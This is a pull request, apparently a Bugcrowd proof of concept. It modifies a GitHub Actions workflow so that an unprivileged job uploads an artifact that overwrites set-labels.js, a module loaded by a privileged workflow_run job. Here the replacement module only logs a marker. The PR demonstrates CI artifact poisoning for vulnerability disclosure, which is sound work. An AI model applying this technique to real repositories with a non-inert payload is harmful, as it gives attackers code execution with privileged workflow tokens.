### PR TITLE
Bugcrowd PoC: inert artifact marker

### DIFF
--- a/.github/workflows/labeler-get-labels.yml
+++ b/.github/workflows/labeler-get-labels.yml
@@ -34,9 +34,16 @@ jobs:
           }
           await script(config);
 
-    - name: Upload artifact
+    # Bugcrowd PoC: the artifact contains only an inert marker module. If the
+    # privileged workflow_run job extracts it over its workspace and requires
+    # the same path, Actions logs BUGCROWD_POC_ARTIFACT_OVERRIDE_20260810.
+    - name: Prepare harmless researcher artifact
+      run: |
+        node --input-type=module -e "import { mkdirSync, writeFileSync } from 'node:fs'; const file = 'proof-artifact/packages/tools/pie-monorepo-utils/pr-labeler/set-labels.js'; mkdirSync(file.slice(0, file.lastIndexOf('/')), { recursive: true }); writeFileSync(file, \"module.exports = async () => { console.log('BUGCROWD_POC_ARTIFACT_OVERRIDE_20260810'); };\\n\");"
+
+    - name: Upload harmless researcher artifact
       uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
       with:
-        path: ./tmp-labels.json
+        path: ./proof-artifact/**
         name: tmp-labels.json
         retention-days: 1


### PR DESCRIPTION
## Purpose

This is a safe Bugcrowd proof of concept for the artifact hand-off between `Labeler - Get PR labels` and the privileged `Labeler - Set PR labels` `workflow_run` workflow.

## Change

The unprivileged workflow uploads an artifact named `tmp-labels.json` containing only a module at the path subsequently loaded by the privileged workflow. That module only emits this fixed workflow-log marker:

`BUGCROWD_POC_ARTIFACT_OVERRIDE_20260810`

## Safety boundary

- No token, credential, cookie, API key, or GitHub App data is read, emitted, or sent anywhere.
- No HTTP requests, external callbacks, repository writes, label changes, issue changes, releases, or deployments are made by the marker.
- The marker exists only in the ephemeral Actions workspace/artifact.

## Expected evidence

If the downstream `workflow_run` extracts the artifact over its workspace before loading `set-labels.js`, the marker will appear in that downstream workflow's logs. This demonstrates workspace-code replacement only; testing stops there.
